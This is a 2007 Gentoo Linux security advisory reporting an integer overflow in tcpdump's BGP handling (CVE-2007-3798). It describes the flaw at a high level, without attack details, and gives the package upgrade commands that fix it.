[ GLSA 200707-14 ] tcpdump: Integer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: tcpdump: Integer overflow Date: July 28, 2007 Bugs: #184815 ID: 200707-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in tcpdump, allowing for the execution of arbitrary code, possibly with root privileges. Background == tcpdump is a tool for capturing and inspecting network traffic. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/tcpdump < 3.9.5-r3 >= 3.9.5-r3 Description === mu-b from Digital Labs discovered that the return value of a snprintf() call is not properly checked before being used. This could lead to an integer overflow. Impact == A remote attacker could send specially crafted BGP packets on a network being monitored with tcpdump, possibly resulting in the execution of arbitrary code with the privileges of the user running tcpdump, which is usually root. Workaround == There is no known workaround at this time. Resolution == All tcpdump users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/tcpdump-3.9.5-r3" References == [ 1 ] CVE-2007-3798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200707-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp5vCCAquvOU.pgp Description: PGP signature